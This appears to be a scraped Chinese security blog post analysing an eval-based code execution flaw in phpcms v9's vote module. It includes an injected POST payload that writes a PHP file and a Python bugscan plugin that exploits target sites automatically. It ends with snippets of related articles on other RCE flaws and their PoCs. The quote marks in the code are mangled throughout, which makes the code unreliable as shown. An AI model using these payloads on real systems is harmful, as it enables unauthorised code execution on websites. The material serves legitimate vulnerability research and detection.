phpcms前台任意代码执行漏洞(php<5.3)

phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞
/phpsso_server/phpcms/libs/functions/global.func.php

/**
* 将字符串转换为数组
*
* @param    string    $data    字符串
* @return    array    返回数组格式,如果,data为空,则返回空数组
*/
function string2array($data) {
if($data == ‘‘‘‘) return array();
eval("\$array = $data;");
return $array;
}
在文件/phpcms/modules/vote/index.php中,我们找到它的执行流程

/**
* 处理投票
*/
public function post(){
$subjectid = intval($_POST[‘‘subjectid‘‘]);
if(!$subjectid)    showmessage(L(‘‘vote_novote‘‘),‘‘blank‘‘);
//当前站点
$siteid = SITEID;
//判断是否已投过票,或者尚未到第二次投票期
$return = $this->check($subjectid);
switch ($return) {
case 0:
  showmessage(L(‘‘vote_voteyes‘‘),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");
  break;
case -1:
  showmessage(L(‘‘vote_voteyes‘‘),"?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");
  break;
}
if(!is_array($_POST[‘‘radio‘‘])) showmessage(L(‘‘vote_nooption‘‘),‘‘blank‘‘);
    $time = SYS_TIME;
   $data_arr = array();
  foreach($_POST[‘‘radio‘‘] as $radio){  //接收POST传递的radio并转换为$radio数组
  $data_arr[$radio]=‘‘1‘‘;
  }
  $new_data = array2string($data_arr);//转成字符串存入数据库中
  //添加到数据库
$this->vote_data->insert(array(‘‘userid‘‘=>$this->userid,‘‘username‘‘=>$this->username,‘‘subjectid‘‘=>$subjectid,‘‘time‘‘=>$time,‘‘ip‘‘=>$this->ip,‘‘data‘‘=>$new_data));
//把字符串$new_data放到data里面
//查询投票奖励点数,并更新会员点数
$vote_arr = $this->vote->get_one(array(‘‘subjectid‘‘=>$subjectid));
  pc_base::load_app_class(‘‘receipts‘‘,‘‘pay‘‘,0);
receipts::point($vote_arr[‘‘credit‘‘],$this->userid, $this->username, ‘‘‘‘,‘‘selfincome‘‘,L(‘‘vote_post_point‘‘));
//更新投票人数
$this->vote->update(array(‘‘votenumber‘‘=>‘‘+=1‘‘),array(‘‘subjectid‘‘=>$subjectid));
showmessage(L(‘‘vote_votesucceed‘‘), "?m=vote&c=index&a=result&subjectid=$subjectid&siteid=$siteid");
}
/**
*
* 投票结果显示
*/
public function result(){
$siteid = SITEID;
$subjectid = abs(intval($_GET[‘‘subjectid‘‘]));
if(!$subjectid)    showmessage(L(‘‘vote_novote‘‘),‘‘blank‘‘);
//取出投票标题
$subject_arr = $this->vote->get_subject($subjectid);
if(!is_array($subject_arr)) showmessage(L(‘‘vote_novote‘‘),‘‘blank‘‘);
extract($subject_arr);
//获取投票选项
$options = $this->vote_option->get_options($subjectid);
//新建一数组用来存新组合数据
        $total = 0;
        $vote_data =array();
$vote_data[‘‘total‘‘] = 0 ;//所有投票选项总数
$vote_data[‘‘votes‘‘] = 0 ;//投票人数
//获取投票结果信息
        $infos = $this->vote_data->select(array(‘‘subjectid‘‘=>$subjectid),‘‘data‘‘);
//循环每个会员的投票记录
foreach($infos as $subjectid_arr) {
extract($subjectid_arr);
$arr = string2array($data);//调用了string2array进入eval函数
foreach($arr as $key => $values){
$vote_data[$key]+=1;
}
$total += array_sum($arr);
$vote_data[‘‘votes‘‘]++ ;
}
$vote_data[‘‘total‘‘] = $total ;
//SEO设置
$SEO = seo(SITEID, ‘‘‘‘, $subject, $description, $subject);
   include template(‘‘vote‘‘,‘‘vote_result‘‘);
}
所以执行的过程就是
1.首先找到一个可以投票的id参数subjectid
2.发起投票,post数据

/index.php?m=vote&c=index&a=post&subjectid=xxx&siteid=1
subjectid=1&radio[]=);fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"vulnerable test");
3.然后我们再查看result,触发string2array函数

/index.php?m=vote&c=index&a=result&subjectid=xxx&siteid=1
4.再看看是否有readme.php文件存在。
附上一个用于bugscan检测脚本
Python

# !/usr/bin/dev python
# -*- coding:utf-8 -*-

import re
import urllib
import urllib2

def get_vote_links(args):
    vul_url = args
    vote_url = ‘‘%sindex.php?m=vote‘‘ % vul_url
    code, head, res, _, _ = curl.curl(vote_url)
    ids = []
    for miter in re.finditer(r‘‘<a href=.*?subjectid=(?P<id>\d+)‘‘, res, re.DOTALL):
        ids.append(miter.group(‘‘id‘‘))
    if len(ids) == 0:
        return None

    return list(set(ids))

def assign(service, args):
    if service == ‘‘phpcms‘‘:
        return True, args
    pass

def audit(args):
    vul_url = args
    ids = get_vote_links(args)
    if ids:
        for i in ids:
            exploit_url = ‘‘%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1‘‘ % (vul_url, i)
            payload = {‘‘subjectid‘‘: 1,
                       ‘‘radio[]‘‘: ‘‘);fputs(fopen(base64_decode(YnVnc2Nhbi5waHA=),w),"vulnerable test");‘‘}
            post_data = urllib.urlencode(payload)
            curl.curl(‘‘-d "%s" %s‘‘ % (post_data, exploit_url))
            verify_url = ‘‘%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1‘‘ % (vul_url, i)
            curl.curl(verify_url)
            shell_url = ‘‘%sbugscan.php‘‘ % vul_url
            code, head, res, _, _ = curl.curl(shell_url)
            if code == 200 and ‘‘vulnerable test‘‘ in res:
                security_hole(vul_url)
    pass

if __name__ == "__main__":
    from dummy import *
    audit(assign(‘‘phpcms‘‘, ‘‘http://www.example.com/‘‘)[1])
时间: 2024-11-10 14:41:34

phpcms前台任意代码执行漏洞(php<5.3)的相关文章

Discuz! 6.x/7.x 版本 前台任意代码执行漏洞

一.漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. include/global.func.php代码里: 01 function daddslashes($string, $force = 0) { 02         !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc

ElasticSearch远程任意代码执行漏洞(CVE-2014-3120)分析

原理 这个漏洞实际上非常简单,ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理. ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码. 而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户可以直接通过http请求,执行任意代码. 其实官方是清楚这个漏洞的,在文档里有说明: First, you should not run Elasticsearch as

20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞(附实战exp)

Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的"二次漏洞",通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行. 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响

php 168任意代码执行漏洞之php的Complex (curly) syntax

今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML 通过代码审计得知,最后会执行 eval("\$array[showurl]=\"$filename_b\";"); 而$filename_b最终值

漏洞预警 | Apache Struts2 曝任意代码执行漏洞 (S2-045)

近日,Apache官方发布Apache Struts 2.3.5–2.3.31版本及2.5–2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)的紧急漏洞公告.该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器上执行任意命令. 漏洞危害 攻击者可在HTTP请求头部中的Content-Type字段构造恶意代码利用该漏洞,在受影响服务器上执行系统命令,进一步可完全控制该服务

PHP-CGI远程任意代码执行漏洞(CVE-2012-1823)修复方案

首先介绍一下这个漏洞,其实是在apache调用php解释器解释.php文件时,会将url参数传我给php解释器,如果在url后加传命令行开关(例如-s.-d .-c或 -dauto_prepend_file%3d/etc/passwd+-n)等参数时,会导致源代码泄露和任意代码执行. 这个漏洞影响php-5.3.12以前的版本,mod方式.fpm方式不受影响. 既然出现了,那就补吧,以下都是自己亲身经验,本着开源精神,做个分享,欢迎留言! 三种方案: 1.升级php版本:(php-5.3.12以

Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920

漏洞背景:2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical.这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core. 漏洞复现:1.打开网页先登录一个管理员账号.2.访问 http://你的ip:8080/admin/config/development/configuration/single/import3.然后如下图所示:第二个随便填.poc:!php/object

[2012-4-10]ThinkPHP框架被爆任意代码执行漏洞

昨日(2012.04.09)ThinkPHP框架被爆出了一个php代码任意执行漏洞,黑客只需提交一段特殊的URL就可以在网站上执行恶意代码. ThinkPHP作为国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架.不过大多数开发者和使用者并没有注意到本次漏洞的危害性,提醒:此漏洞是一个非常严重的问题,只要使用了thinkphp框架,就可以直接执行任意php代码,使用thinkphp框架的各位站长赶快对自己的网站进检测,并修复. 修复方法: 1.下载官方发布的补丁: h

i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)

打开发现是海洋cms,那就搜索相关漏洞 找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49 直接利用其中给出的poc /search.php searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan